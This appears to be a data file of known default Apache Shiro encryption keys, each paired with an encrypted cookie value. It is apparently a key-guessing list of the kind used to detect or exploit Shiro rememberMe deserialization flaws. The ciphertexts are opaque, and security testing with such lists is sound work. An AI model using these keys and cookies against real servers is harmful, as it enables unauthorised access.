+WcfHGU25gNnTxTlmJMeSpw==:7Y+YpR48g4ruKDSkXRzstL9bTHVW0FLl78KDLY3ErLQFbsVwYxsCKxVlWU8eNqoxnYE8p2dC/eA2uKAWXo6KHFfGrHJMe+92pY1dAgeVcqq0hlQwTuDMwRTKL6hJrugaWzlg9O6WjWQ44K7Xp8pZoLUbN1ueB3zWk5M0EFTWY06Z07WpcTE4vC7znYdqb/6r5TdfUT0ZTsx9fAWxkG0Zw1Vf529LDHHRfCepflOAz3RgdxQQhyjEwOuOopn40IbW7UemK2Df+kseSGafSiNltg+ZpNrvgxB2AZ/dke3K84Z7XukyjowUGQBcvol6IdpAF3WjtBfBEKFjruGMwKRhfJcF0l+jtVeyxm1kCtp0JqQzmpauQwPyTyhXZ3Txdcr49q6YnS0LVWxH4OS1vLpLfmKxIMjfU1DDambmvzChHa6KTNoK48cFl2iBIm93waoiXDoUI3UDKFWee/Wuyvy14QpQQRLUsQvfqmpHc8Q+N48E/8DGMySqfBR3ZWv3BjbQcSq2YC4+h+v7cVhL7T8u9RDvGBAyFaQczhdyK9dis+I= +6ZmI6I2j5Y+R5aSn5ZOlAA==:Lk/MMCdCou4Ltgr7zfLBLXgdyfm0CIJInhhjmggwyaDFqMWUeT+mRchXZZvWDfyg24DV57Zt/VsNd99vpNbEvpkKr/KfgsajaHn0R00Sbvs7Hr7AA2I2ve8wMoKLB5f57qhiQsvtG//GUxlYG0RhTXitL/ot7DwIcxRJBkmwqj+XorRzMWpFk3zSWingkSoOTigIwG2n6/K8lS8zGNdUcDdZngu1OS3D9hkTzP2BpW2qA840cMHcunIMe887ECWew+wZzIgwPCiQZ+NUbUvluUTneWngouAAmghJqz3st4L2QbY1aeQH917reHuL6waq+PMmXIj63jMmCz4sKBImSNHUYtBrzUSoICEbsfPxv6ehxWblvEZf0CdYOkN6JyYeJZsqFsdGGbKSnWLOiNTYUHZ+Vs9TLID+SO//hzD+/t+LPu9xM7Q0GiYveWljm98r3VnzFsbA4s/aeCgx0u9C6lt7UmwhCSByAOEtOkc9UEDAvpf1IBM4pPaalOkjR1B9KQuAMYtMbTQRA8OYufOHH/brES7Kg1M+OaMl8fjZeq0= +Z3VucwAAAAAAAAAAAAAAAA==:4m/d2lk9S9/aDXn05gRQFjoMauaHVfVA8dWHSNZttZy2RTUHT1QPXKSfo+4gYtWddQ+Q+VfxcDaa3aw5sm78kT5bxg19dBwwtDIObgU1+sYyikWe1KYDgyw+wapQVjVBHqCT1zLDAIU/AQRfTo344HyKJx3eKFZ1weK9Sk7ZsTV6d6EPggQ6WmyjyWGW2aWNfDTfKwez1AtSazfQFwxoKeKHvegByITuna3llm7+vgO6vU+A/kR99J5qagG+L0hccpSyxPpPw6PYsa/IKfdgqUzKXXeeiT55D2smZWtzjyX0oMaUmagb6BAM5fyWgNVdQRAPL/iZoy74Nn43Lpxem6PT1jQQ/YV84lhFwBhxOR+ViKmqo3nSSXE+Od8TK7OstnAnrVKuQVbv4E4QXrbM7DyhTTf579fCBlCAO2cxDWqLDeFRKKFjCThTNjDlUvWttZfljxdV95ya3aFnY7fjTgykEFiuDvFK1M88NUo6bM9CRupmpZ//UzwPkRMNFWg+h/DbcxZGboTruG+o/PeTpY09uGde22BVedBspG8hFDY= +5aaC5qKm5oqA5pyvAAAAAA==:vmpbZD8Sgkjs/r5Il31r5khiRHXeXKoinhNMW4AdsuYBAs7/ehyEEVb45et7B76hIvo63NOkWodSsuiWqN6WBTniby0uEMIS69IlseS1bVuuxVAvnCYGJRhvCe9keRAQmC3a8zdGyxa7yPsVc0vl9iaBn9qwyCtTF74kvAx+iUEBUWiMM8HwjSTg07iHyI6AijRhxiEaU9t1Y9vu3mDPU3tux+TYLg3EycHoMCWpd4VNFY77mVtSfkBSAfrC9wYfIuBbo1dAzgKshbRJJHveHuqivL8g+y9nw5Qa4OqZ7wVpMuHmQXPfW+B1A0n0pnEij6/dVrUF8eGq9l4zA/p2NGQgxisTyUO09rQPNgtHWUUcUTBANPCLIJ+GxB/j/ilB8JN5ah3Vi59AwBFa2RfcoRRzoN5YBTeDGZJstCS1BHYuHkwX4LTUPGBNYKHcLZ/DPWf2gNcFcoqaVM+Pu6PVuh8Wx4Nn8MwFl0GQaxyliaZsQ6n6fS9HNrnblKTaccFybUP8DFuP33Bdvmu/Ea+taGHg4UF7czq2Kl1qD9xFZhw= +4AvVhmFLUs0KTA3Kprsdag==:fe6tlbRY5/IcICWiI4cgEhgCZlzQJEM2vEEXkOkoAdNPImm1mBMA/BN6JlVMJjrh/cumE8XMr/vXcBCWqyI0eFVz2coYpiI+cnu6fJBINQ7GuUxBhoHUg855/vGxu5ti+a5t4CC3UXMvD26ihpMYPuLXar1lbog0qs/BOQeKmQ34t7viPOVfmpVY0fCRz7Z4cLITRNOzjDjQJOZK7N6uhhNyGwoxzOEppJyX4VsbMMYZI25X4un1jCv81zjNamui4UHK0Cn/WvI4SK2a9bod4XNK2J3KmawCMLNGjjk8rrd1sPhUB98sNLJgPy0+ED7K4xdCmQVWp0xp7/7T5t6I68OjFxkIx7b13ylgUp65aSF56l1TYpsJ9+A8VRumPq9Pp/Gne0ReHZAU461M94imbnXaQHUWDw9UmNehdCXYclezly4uUH9+Ts/JNAGDWlOdvM5Q9g+tT/Vy8G7J0jI4k2Oc+Xa5Hdy3P9kUi0bmrMVYH9hWXqNXkMQDdGSs/ZgfIk2WMiIGYHigH4o5tU4Ak1VuB2yC/gpu+cfZmwEWCvw= +2AvVhdsgUs0FSA3SDFAdag==:dCCijmuOlxnasKvmUw6DSe1BB8ZYPJg8TxtjAIH62o+0BF8BCCwGO2i7IbKtP8ggi7oHOsJeaGwGe4JtmsQYY+jC4Hbkl7toFKU1VhOrioTKIFHRRTs3wUMARPIGMI9sihruUXsZW2XKsAcX2RvROAm0oSwGBGUNvHF8vP9Pk/ep+1KbJlTovAUOtJrZ+ZBQal5LomSB/zxVfPKQrX09eYFKAwINzgW6ByD/pO2Zkel3EYSuCqMV808QInFVYiH6P1j/1AN25azDETYY7BZCAITNkfHp7jPj2yx87exf9M84XloSfPdsGAQt06/gps9pfZGtY59CbHS/Nixp2wus4gDlytx/s667eyoB/k6xWuqDucP67uQ4G2WX8wE6idnIpo7tbCeni2+f50Dayd2hyc3+r2B2ryP4V313wSJGtwxkZneuozUjBqEsgrVo1C4hl3INBsk6+e49P38mGevMPviygBSQbAzukgw5jL0+NBOerQfZV8VmGvJqQR1V7F0m7ufKWZIkDQ18FuDTqaJdlOVZ8/5rlITcBDvN/QvAX7A= +5AvVhmFLUs0KTA3Kprsdag==:3XXxexQnlRDoMhl++m22umxh+2TA5pByOdZS+P77I5luvrrMwYhyR5Nrtv/yHDkXSAs5ovuQLoyyFglvurYeFstRkhdtr8Z+BkqWdqmyZYdsky54zEELm6xNRPd+BXLDq5mXps6PgIyc4eHHdMXR8c1OPiEKLC+kWbL+m+6duZlvH0pTx5P9IRuxlVrF8SLjRSVG0K2tJoyVenu5EwEzROByjlpdgxam3cKQIjZyu/RtElW+xvm32RsjauRgEPZypp6ppam36ujK3JWZcaLRP2QRQe8rIQKt96xFqRSJh+leIKRd073nj1jP1vb4k2tCNcWa4j0aQ/v04Wzp8kW4rlVy5FlmC6cMOCIB7xBQG+S47dts3VigLFWhu0KC1+6mMcm8Lj9zpc87fnN2vwi58R8/rVVlAVf5sV2lS+GQ+BmsQY/awR6YdYEOUNeTqW2lIyYokznGKpUz2SzbowuN8gSUjt59L5RFZBl+0NRHem411MTQFG2rz7UicAZGVl0lxpEax1AQPz53AArDhRy69QeG0c44O4Hi3hILhklLs3A= +1QWLxg+NYmxraMoxAXu/Iw==:ppOucWbS75OxmQdn/u3J6AhJRxC290Y9mhhgsrZbUjlfvM7AWSRz2QsL8veBbqvYqlXigi1XCSGpkcghP8a1n9a9E+S9sxdSCNlbKuwZQez+V+8j64CcVQpJP833hghlCtINypHWOQJuyKkQhmUuryHeT3jPZS9G1pAP5mOjKZGGJ2fi9n2HRH3zrOG/yOh6c48US4oVBnHAgkKvJ2mfZHmVjf7FQptOWyjVVHlFJofINsY8IGGekXyBZfeiujo8kUnof1tLopLLmICvl2YbVhGwc2qDfzXAAgetXiho5q/10Sz6LKP9ULibyFlpEZjTdaaS+yKKIyj3uUpr6yoYeN7EThWKISCgZdxIJ/PAWdhcicnChNlhxJFlv77wqcWZVxwumDNQpaxjQcrOWxY6YBc2hMvyF76fa5coVWJPQq19Pgv+TO6Ucm8tg5j3+zMWRdr8B5vnjQnMKfsVY5PN6WV3OF5JJwAtzqdzdPFdNx1V+mSkGn08/kBbFe5yMqe2ItGgE+eNXX3fwCmlLOQjg+LH9v0xNrlsfO/PWFZTY68= +ikB3y6O9BpimrZLB3rca0w==:c4iXinf7LSAmmPzds/CXxxIIY83DcepTqlU/esyZfNwGfRMwg8yHHJh7xi6ACaMmusYQyUDG6bg7BMVZjcuKjnht9e718CVsrMrs1kc4RWvWtwguhuQJHXeDJvR6m4g9Mx+wEx48SsAJ3hxuGj9wRPQz8u8Ti8gEgRZA4Z7ff0bHjh56qhVbOcxmq5ormsMbSXwZvEgBDB/DR9dW9vux5yzhrHA//SqfscS4YdlTe2we+Y09hIZzn2rgCCk093Az+DPUQ5kKHVJ+SBJQL3MIjP564dFv9hOGEXo3ScczuxeXsKV6y58f1bMXYlPN/4fU7BVD3ZcWZ98pAzCv/lTKwAakQk4ZxDJ7RSnK5Icr0qNxkWUffsaHO1SQlJKKZrrPik0yofgsolxlPq7/znSzx80xBd+pxLvdgXK/gWEbbYpbpett3BH6fPxd0xOROwLinmKrfrgPPPQqAfjlN39tPSHdZj9lViZCh2DnRbemD4ekDIUJTt1wFyD1WTJcYJ//qhqfstIreKfGBVfQRufXuzwn6jrCAntapp8CgiErXJ0= +0AvVhmFLUs0KTA3Kprsdag==:pgix+6wz8nmrVkQOh3cHYZSbAkcGdnLMr/HE2inEJ7q5kzgy1ykMrVhX4YW2Gkuc3DEb82wVc/uQnolXFaIUqQtO26gz7NeEFT60Cb1ANlZJ0nBN86ihNlRDZdApTMEWgTYrChtzA3rkx9D7Q03FWPDihLGdDzsp+VTQv91UpqF8Qmd5hLfdJ0f6QqOczYwY5bOMClCt1o+mpKsiMFXLP9FvNecF/lUz0ZXjGNxbTUHr/oYiuQaeoFkftdiG3vGJ6Cm87vhkTmTeGyyN/67L0dDWF+/CveCeGKwYaaoIIicoOf9tzK0YWIzNmXl7ddb/T7Jq7HSkx74rgTVpTh54hXkPfvpNr+PRpRyighnticx9pgq1Qzc+SbJmywj3QsFpyUmL4IaWxvRrjk4DzN377GPYWN2EhfXbv9yZSGRzxNWqzLoD8Vboh18jXDENgxFapy+bHSCiRBmpBb4+0GBNiPMBqYj9UTqqODAoEH/ZC6Q9H01I6L8ZggN76PEBomSzhMHSwkPswXTePohUU2ziR/5TJlkjUf/vSiMv0uf5wzE= +1AvVhdsgUs0FSA3SDFAdag==:pYZ1J8zHk5Aiw+0i8MsM+qX0VzpNQmVKxv2WXHmEQ6YMtnLREYVG8F+HrQcFqdDb8np6BJBM4/ju6+f/W4TiBIoKTNr2wsAO3AzCawiFSxfjMkuyhLF64QL4T4QACgXQN14YLjqrPDHMJ90GsETmz1/bDGjTj61yYeFGS49nIJDw9GroJdIp6PdBsOQ67NV1dgskrmxbD2KuqtfPzNZUbtK4SeZn4JGbyLhglM9h+N+ttOqrjHht3VQmSCMu7JfX8ImSh7zp4cO4ORkyEvilJ6G6hk80hXEM0kuTTYG197ziA6uDdM0VVLiSU0U4oC4I+gFDjhxpo80UG10MoeRLWB1ue9osfQU+s7oqrK3BfW/8xMJ0Kq76lOaAy/oNs0L0VV5ESa8cgG0y5f2Umpmh2wItCmZL0E9r8EKUwbu0/uqCjC+kVp4Bv0LIzor3UVtLDt8qHLx1LqTHEpaAOhExeubMQsE4fJu3CTOICAm6+2h6g9HhlZfglcKBqyeUFN5nuM+kUkRlVZw6mk94Xn180uut5owwBoslmnmelilwYOs= +25BsmdYwjnfcWmnhAciDDg==:KHSZgp50HRvXI4TSZ8aSXT54ZvSt3RkVbz2oRi0NnozEdXn7ioCtIwijxgCTcVQVRwMj5+xZRAVE5fRn+vpxhCg/dPUJSi99QLsodhRkTVQ0BGgmymOarwxqiQWYQtUG35/7ZKu9wneYuvLmroPe32Y4EszzgwOMeC+vBhffiyfHIxV7Qqk9xZAPxSWr9VG7WEy4+ed7TZAunWXSu+Omn2Gl+U00fN9kilS2WVAHTywpgLqwzHhJGodmVo/rB1eXKcLIfcp3It46ckAmIDruBfQP0Q6M3OKlxVRxG7yEy37kZj+45zPvp2E1BkpzgVfSI4BRyy60z/0KAkBWJHv1fVdcTdlXFLqk/sYdXyrOQmXIS1LoCRJkHtD8mLRs2idqJeWAlgugP2WepxcNn0ANxRLt0cWzpT58cuY0ocxt8+k1PcK6oRt/fmbXxvVNEredC5tcdJ9yE/dOLfaoIIEFoGpQ9hnEOZtr8BlUmkGxx6b4DPmuxgW/ntsPwUl/ZksdAR+lp5St7C6nJ/5ePG3l2U5uvcNr541tDikAu99piHE= +3JvYhmBLUs0ETA5Kprsdag==:XnioKV/8g64ff6G9Pa2037bfSX+z3LscUophsv7JDQbPwHN5z1GzjenFY9GzhTOUZ2wv7Qy1tdxnNFNrUWJz3aux9ZehrSX7TGxfNA2ljda3+WWPTKgiDhtxGTkCLtG9W9lGYEp9D2rgmqBtVvox+HiP2AqNHvl9dJ+l9OjmIj3pjyIh6QdIylnT1Lqk2dbnMFKs4q1npV3R3ozY1EQjqYEx+mcQM23P3Zv77Uuv0y+pHWb1aI+DtJRy7fDeqfTtA7hrVoGFJZzM6eYsIrArPB+7dJ0Uiri96QXKvAKeUrI3pTxEr8w1W5NUBvmhrgJhx+hCbNwBXcZRLvPX3TgzQODXB5WfbEEh7ZbE2SDJEVl9sOmNlY7fnDDCEpGPMQR6d3rxlUjpL9zz0HAyP+79poCn8II7n7UKeQGkFecFYHCnQHfK96XK6cDQisqObaaKdCTD9YgdaQTn1jq4NirbDE+kz/2zfD2uSoVfmzYQbD92Hmd27cFPOUQXPkmHUdupaXgs84f5j/ah6gRNZtL9JGSvtaZ7U7NQW5s5io6uB6E= +6AvVhmFLUs0KTA3Kprsdag==:4CpBgRMJFuxbCMpNEfPj4qJ27OcT7C7ggxZzQbpdRKU63GMWQYRIjTFVUhID2j0dVx0IE7qMyi3LruEndmdHsTL6QAvgzigHkIFp1qqXW1kqJTiblacBLLTcy9Gnqy7YZ0lk/PoufaNNWhEhXAkaS3HMYRubj917gxfk0NL+ndbzvnCZ6Hsfdl5FoKGnnnLrcPNUbAaLradQE3rnIJMDgHAr49aIIjZgPhxI0zATbhN+txHIJZcc1Wv7rC4ISyRVAS/a8BaT1iVmEEi3kkJbc7qaenuHmflyTFt/fusPsJhqNbKbERIhUol9pIArRPBvwGpM12KaAcEICHDi1THQT7pfip+oEmPrSBNKFsEPnRfr16SEbwNrrbu1yXwEg1zyfL8vcVWEbHpkc/lTCy1aHEgBkqBm/itwdD3qt7n1OT7OFSyJCz71wHR8iUJ1MoVOa2MbCoci0+zl0iFBFtpJR2BwhVZnNuU2fIfqS3HB9b7W3i81r2IVH5y7bYjlyqrSauykHJsrQ0ewydn1K8yv4lZyhudkvnEjORzhmLoYAnA= +6NfXkC7YVCV5DASIrEm1Rg==:7NkxIy12IB5jNOKNEH57ilc/EQXu36k8PrCd5bbdLa8uWVstx7DH3kjeBKqDO+1II2vcPVCzum0MJs/P1eSZgD+2EYKKOPCLU/hcrGqVG8zDrIIjY/byspvadaO7VeDnvEvD2GZaIlPVMf2XPQNJ9enVFHJ1HfIZBrfhEfH/u8oADz0/jto8jmDN090r8A3mLvQvnsvKqQDrznHR0XyCtzs717YXlWVrVhVs9JdcdazhSCq57L0N9ZD27cT/1piPl3lP6pdATEmGk+768FVcrMIewKVqextJssIU6s7nMp/6rtJTmWr5eU1IgeP3DrXcB3zwxXHRuTn+AAYW4gJBEFt/oyGtS1W04NmjL3OWgxNLTGRauwa2ozTl25mlf0s5yuBbVcYiWx+lQm23W9+rnB0IDwzX6hL3BzE8LidImDJPdtSVwZfqMLp6IFV97u0tI3S7UCRooUujpZGnufLYpdGSqZSRbR9zq0EYDexVf0KzcfeMAgzMmflKfBbkcCHXw4hg+dVbdkQfSPI9O/0n0xvuZnCu4EavvnMWiK2M+TU= +cmVtZW1iZXJNZQAAAAAAAA==:+Olx2gj439QnvtjYddn8ZXtrhRYiwA7zUN4pYZbMi9jeDlaud5MHZYzcRfn/U7yuplwzPmpC2nuLR99cqypP+UUWV6DD1fTFd4gL3gnHtJqUkZbto06Djs9/Sjxh3MJLi+wqP7locL4nBfAIOieaw0rQftMYqOZCuvf0ks1PCpL1pLeqIr64Vz6qhRCOOSzgq7JsmQX5H9w03PaRWCFgdEg2B3+37OP9ojFFy7Jx+9/98BVFRSLxcXuy4tnxIhGq6nqguHJULegnQwJnIQC8FlcLEXEjFVtsBFDHDhhRRrw4fv/fNce7JmKpQKr7Ii7rGnHe80iWUY0i9ODYOyq/lTAI8Qzcpbd/3aGr5XX5d78AfG2zU/NpxUfKo6iKBh9+Zeu7TXdAqFh1mZ1AdVodGZUDpi5c/qA0jh1l2+UBk/1tH0jF7Grvc7rtRNxlsGRCGi9IdUXTqaUkK0yftVX+npjDF+vBL/SoQ2+ACofCKW+TtlX/0hotfJokM9H7+YUHYz2IWwmE2HTWChmUpGq8VYP+juwumDZmo+TZDU68WwM= +7AvVhmFLUs0KTA3Kprsdag==:fVzYDykcf7EplOr9Flkge24yIM20NxhcsBu27ZBNK8wuwLIO77SYMNrUXEB3uhwIEHX+QYBMsddE8/w+eYMiqS8/1In6uO0wmUMojr4ZOqrabhZyvazMFboYfdqC0LWW+da9U0LrFv4byK+ghigotPHNbW4T0vPhxEOyR917SdjntujCLrfHVbsuog5zb/LRq+8OZqITerpnvJ06PAecOE999Zk/b7o9qkSm+M6vl4ETutFcIfkqFYPb3X6TO8JGrPES+1EvE1HqSTphHxbMeZdhLI/cr4UwnZ9t8TB9Bs8FQa2J5y9mZ5lGztKz4z0PU2GXhA7LTbx11BlFr+oqmdpRONi7ctlGk18VQClyYqFfmclBIfdeT7Qdp4NSn9BCgHBj/2Kd89Ar1yqiM15Q3jD+LKRuGmQxJY51elERxYneKzomLV/83zFnHzLnExnkVQhnORByquyy64xXdFFLMzgbxpk8Z8ABWtWpOrGGACCf7jlPaqx2Hxe9WpOGp9tgbb5BayWWVxlR9hQmBfvAgZWjL3Sw9QGHcvNsuJSBusE= +8AvVhmFLUs0KTA3Kprsdag==:iiGCN4mVPDjyfR5spvUpXfY031NI+4QVdv5YD3eI4AuOnk2TxYhtyQMZZTZG09eeNrpUFUsYfnWxCOn05sFkmzGyoSwwSt5zMwSaXQyGqZKEdrPKEzC9ycsd70iOl7ZOhawQ7eZGMwQCelQUMhqKFj8gNZIQkOtPwwOAH96JGfTIAmAHpY/DnuLYBynDmx8MQ/RIA4BE3LhHKrgAYPRS83xDdFoov+nhT0yrZcL8M1WvbGOkt3IiyvkS6AYYt+2NgCEOwJiM1GuYzzddQtt4r4FQl98NHA2ZP4Wgqjt57EGdRxYcftwn9vNufZx4mznl/PQdNOm4EBD5ScE54Bz6UODbYzUPRF0gWMevTXKKMGxviLEM37D+omBwWbN6DEKoI4CRFc0X6mmQCzrggXvKWaQkzwHn+Akp/BOFSC7jnb1N4v25YdaqExctyOD8DyWxcOLbFiqU7Rwz8OEyPTiS0JuWndTFMMtnYLwKmzAa9uDkmAvntTSX1T9tZPhE4HJMbUdRVGZNvHopZGaEJ+hcDcY+hf6e9EMPXhEeImVD2ow= +8BvVhmFLUs0KTA3Kprsdag==:g5ooQfsGitw75EhCgsX+4EKCENEwMi54++y1iUQcNBZM2kW4Kb3RsbLNJRbiipdhiUvNu3LnSeEVCB1j1o2RLGXoVr9j3Nrng98o/m7tbTHJOMhuJgTtqWCBTgPTrL0QIKcxT5Dsi4utJxqP29SWuy3dWYoWcKd041no49HeveuxiYy6dR8/9ZBFgEjvnb67U/5AwDQfRDIE3wJRQf/YgZ6BBAqqBgwTNHkPWjbxnrVtlwg9OuBbV2u3qfJTkrO31KQ2X/fgnkcClPQHq9vrl8QTfGqIbiJSx6/HgXN2PpBI0ihp0GPbHOJhw4szseuW3sJ1Z/WAybbAvgw0uGr3t3FZzPuXnk82iYxhFDTPL1Vqh2o/Sc40BvL1a7RkcbSpwZzkHRe8JGJx9jfu3wdUeyNdzOgFKC08uHeZa6pjYTu4HR7p8E9jUR/604xXPu/nTs0Nwv64BP426pYNfG05402sDQLUH4M4GCogA82jWROnKCi9ybW7Xgy96Cc9deJ2w6OE8KJMiMdtGrLnDVMoRq6XU/HQTYGsSfKcOgdF8PU= +9AvVhmFLUs0KTA3Kprsdag==:S9+yK5wEAMqdrx4lrS0Tb+fnpDmPaELrkqaBGdf2CoGLXDs93FbMcBQ2QovhWQg6StMZUDw1eiPAL9K0//9S5awtxEI/dy4g98YbB44e7rlppUnXMvw/T4crgp5f/6rAnxgC7uMc7DNUScyC6+15YBuXHkJrwtBbWRxOfr6m+i4lVFg5dRA1TuGoGwRxgRBWR2/02MMm6QJGfQF9GrsfvJq92hmAmQ2/Ny8i72qw+fI6bSz+6/KEeccbWXMKvp8KBoOLTi4/grpTI3KmCugzb6WU0UimsXT2AZNQ3Gc2i6M/7NWBrrkVkGN8Wc0pj1JZi0TKhMEGpfVmpGgSVM2r91yHIzWB+hyLlsmmBjNQGgSz3OeKt6QQF/FakXMrJm0RWiue4fU9YNkkUQ3NnxBoA2dJ+OyQEnW3VhqCzInLbF17Sx98zfV4BrgKqvDbet0K98v9/BSMMKv+/J+yK7Dyd5EJv4ZFd/dPBfLP2ILSgAxCRQ8McRvQzDahmix6QensN5S4O9yV99Org0az+iQo3JXJ7CZdDmcf+Pu6uuqO3bc= +OUHYQzxQ/W9e/UjiAGu6rg==:YpI7gpl2i3Plxj+VArNg+S1sWxehI36h2P+vdDKFp9/yebk9fcgWAr1PtwNgrvvmV0eJDr+cS/xArLPbnjZMqK5FqM03Mj4ALe343yWY80apTaqd0Dnm91WEJldU3VNl2Me23+1ZbqKkxBwRRqHxQBzFbxBJBw2h2IPR06NwU5DTIaJIoNJ4D9Bgg1m4uzayvUnslJgygDnrkuHmrXVqDXYzatPcYUhCGqZhU96QqT7NpTVIQ7CQMG2F0rPOsSxlJDrHfvmow0Dc+YhxtvoFcBB2/+pLZVPBnTmyVHbGWdtOsD6GDBbC2YVnjo32DDOonXDdndCM/cr1XXLSvehNcUTu+0re7R6dhofMvgoPpPyvSAFbtpakKC7HiPhpV5KGTCtX39V9bgJ/QM0fhMLjDZcXsd2DJmy0lH0XqnVIFwbKf/VaY2lPVMBvfXiqRGLJMZve0KA2ZM55Aq6/vfTqru/FGiBsfI8ZKiyUp+kUbQPboFt+oNGZg5tILPdXZvFbMUfL2HaRwPdf30Ss+4cz6yMdv6uPXWHku7L0WtST+Xk= +a3dvbmcAAAAAAAAAAAAAAA==:9zDcI/UrK/BT2S6YlqmnSiCxaQ8gki0C+V3uMMUDxJoOjyIn5jZtNkF1u9jeWvFJaHBJrx4arFKkNLPJ3Wj/9c9JRiiKyXNnb/hlIj/1cduaUbcNWB48CGgwv1IcCFbbR/AUzEaSZdEyyKIP8YdXTV1Rze+zGcuaC04cW0F9CfUYtn+bpZ2eixzCVHlAWQghnrbyTfcpshzF76xgXax1hlU4eXuMYxNpjD+k21ISQP/f3xMyjdMDP743kQwSCscjAEaT3Ll/BRcxhg41V0rCd4KpLq0m9PK+FbGajyO61r0ZJc7JCsZgiFWSM5Sh06sa85WuwO8tcH/+i0aqlBPpEo7f9suvkdCGf+/VsqOVn6LF+49MpXzMPqW8MBFub+WkKzo8lz4yV6bcGtRJHXY0pHwtLVyqnegFvqBD368+CknHhw6A2L2M+wGx/w/U2jp9dBWBk8zlBDDZ+Izq+TVNtxtItOxPEStoPzcZI0mCQhAtE+rD9EAGRKD8p0UDj8I9/s2CX98fREdWebGcTiELtvIOOrSc1YWxSe0vBUA2/V0= +aU1pcmFjbGVpTWlyYWNsZQ==:K7v5c4v9XrUe2G5hzdtXZ5Y7rB6oHfImOMJ/UCQzhpHa+mhXLNDM2Z6X/C7hBmniawNOaB0TS1tYZWq3HxbA2tY9izFp0tYP8UAWsbgvQVA9eIdLAa5BSUZVxC6xJA3EcHs0FB46yrqqBCQNfdmhc0xYbhK4h6JGFbsLio3C2RA+h2D6FxzLDs44vQwMgCt85Jtgcej/fXp/ZzKN+ZwhG4qdn/91WwEweIc+c6sfHjdcwjxvffG96GGhlL8PN98rda6PR0vB7ipwsVGxcdFP6C72th6RSsgVyTNmmMVTd4QvX3LzL+5kKj4n3O9wJ5g3ZM3+jztdpyUE622A5yrxCOPiMKM8VbimXFGF2+xTFTxIYSN9ZaAXKgQjbOgOk4631Tsj1LwIrLSjyTiuOsAQOth67s/0LMUsFlV1V1pLE3XcQucBXox7PybHOJTwRAU+wF0I+rjd7OcHbJTehqYykRyMunOuJfFr8W+Zg44EGHMgCxiIifr6zmE02Hp+I/cXyJdG9NMr04cNC3gzzeH0hajeS8pw+xluitfspfSPffU= +bXRvbnMAAAAAAAAAAAAAAA==:9NzFe08tottstCwpXjV/lHyYhIZnoVyO+zu1gk3WoWkHiF0xhj4f1Htd5w7OWFrpnsM/e0WX1E/WICCfDGUqtg4wslgRcMROJGgF5H3pPjvghEj1O3U6kj+lQgzJVyPdmSgfarLIwoicuieobaW1iFKtKj461wpfTCKhuza+70igvLaB142Qw5JuOhiCpuJ72JghLxLuhHoRjk+zGzTl7sEbRH8+WaFqPTmJONdQnJ4NCZRyexG059UE7j/aBbEQOZ8DuywIH5zSgZudJvBZoJJAnFZfbLATzdFmL6qISrUzstPZgOYN+L7qzwOmzEmhIS8XVuxP4qnKM/6+glCRWLWc7fouqtxN1t/ap3SmwFIVW6w38FTDAXjPF2ywmwDKdZa/esNNEcplIVH7U/t3nR6xIQYUb4tpg8uelfyU66A6O59oO7cDMqJ+Upbgaknw30E5a6iczeaBCWna1o6Y2VrnEdLzWSLgcLtYZZs/J23Vn2jGFt1/1etbtjvdhdMsE1y/2jUyxaSsFl1fLTTgyDCxStZ/cXigm7cPy1aylag= +lxuEtAWbv+SgUOXREM+zrA==:HMOSRNvT8uQq1FiTKK/qZBbtZoUShsLfw5ZBj8Uw0P+eLcx/RcthU1yMs24vEsT1CveVYhq56YklfdJEAWACP4WlpQFEWVk0RN5o0xzCZxh9Wy8YdIiRlv93wK8yEvqo7cRy6MCb1uszQmrUtNlSpVT8P3ybG4foGZpVLdosEMyAIGqif0cX6l0IrrehSyl/V9p6mRYiA3mM1FqPtjSp+faO29dfzWwp44fLWMebJ2cCEYtHVfY8futYusbWfJUNcQr3NLFq6VTcOs2ZjqN6mMLOZ3HD9Cl2OIM1MjUm6868PtY6x0f3bq06i5/OsbQhUdTpAT8LWgP7NF3WytttOIy9Zs0W4K39AIemxGpW0o52QhnPyH9hJyvp15s081bqNcCmvdZjPyFadqzAsL9DnaudaF0duualygBQgEjof7dCeC8R8REDcsJyuG5RQJk6bX39vC7vfP5IGN5mrcHrE8s7UCZR3AKXl/eFS37ikUaoINa2nGRTSUZX+KDJgK02m+Dv2bYVjl2QJIigeltCzCw1f7ZCdgEcacWLWf36OaM= +HoTP07fJPKIRLOWoVXmv+Q==:m75grc/rLjZuQ2XILD7N915dMBdo1uKoknQlpiBqWN2WhVhghVoFOsvgdtLAvpHSA+5f2Of0oUIYNy3jVONYIrgZLCJIRTiDJm4Wvujv8HwBTMsPo0r8XtJPaQGaz+ZkISXQDLdnHZy0Guz68ZynK2ZI7DYeBss4LjxS8NoxmujOV8IMWx1IrxhdY47Jbc1a3zqxwLQS8nBs35YczNuQxJVsI4HpUpfkALk9LohyLrN5Bj3ZdKBVuZ5sd0IZ1tc2behdjR4etMlYkrD4tfZpifsq3GsHT9n5MpmpQzhQdvDvbTgM4kdB/X7EbagNau0N+qpayx/Qcxp1jmrqaBfKxDdKy5at52B4k12v+6dtvRIB0Ua/8hEdvAwFaVhxAOB1FviQCTiCa2AmFbVw1SkWmnZs10NRVDXepdzOxJOvkg7iOegbnuFoLH35N3jPitE9ZLV71TWkW5qTJBl623+CpOQtXIWTdsZ0xDtwbsGhnxaaspq0YE4ugLh5WtzDtjo+vRN2xw+Ypgewx15hWMpjFxb3xEuhRelELKQHIUmbHzM= +Is9zJ3pzNh2cgTHB4ua3+Q==:wWHtjKwtqTCTksGwobphKVKGQwa9Dym4RCgj9V3au/TzhuZ18uubWGQ96HmuI/Tbnsykyti0LKw1fDgb7mpGb+ixrIsdZEnfqz2YZKT+bKlZ61eRGRjZFUzMsAK27L9i81e1DR4j/F/5UzE16D4PSzoi2zyr8uN9V/M6Hwd6ESidZ1dW8ji7M7Im7YWzwg0SY6RQxTHj+30yVQAuhZWFY9CDxhi+5TIuHUw1CrMHY5bSPDCirf9EBbPjwcopCvwSNNYYW7f/HwS/NGRl2TZGh9H7uCWwclb03G7MWdElRLywZiDEE9rIF5Tu+f+FmYW8gJTXv5hu7gJflLTvoWIVZ6DjRsnWA2AQAcqREYgvRbMG/2YnFqvOtIu+No2ma83+memufDv6MhaswQ55oywNFWxZNCmacR0k9wUvadm1g06EFGAT4jSJnM0EBSgkiHqHx+hj1cC2uKXVDpNXRFBT6d3YYCYLP9iZtokrTY92jisvOyHaBT/Ajblhkzy4slruUOrP9PUyfT+s+40XTc7k1jmQDuD+GxC/N/lbTUcTWGU= 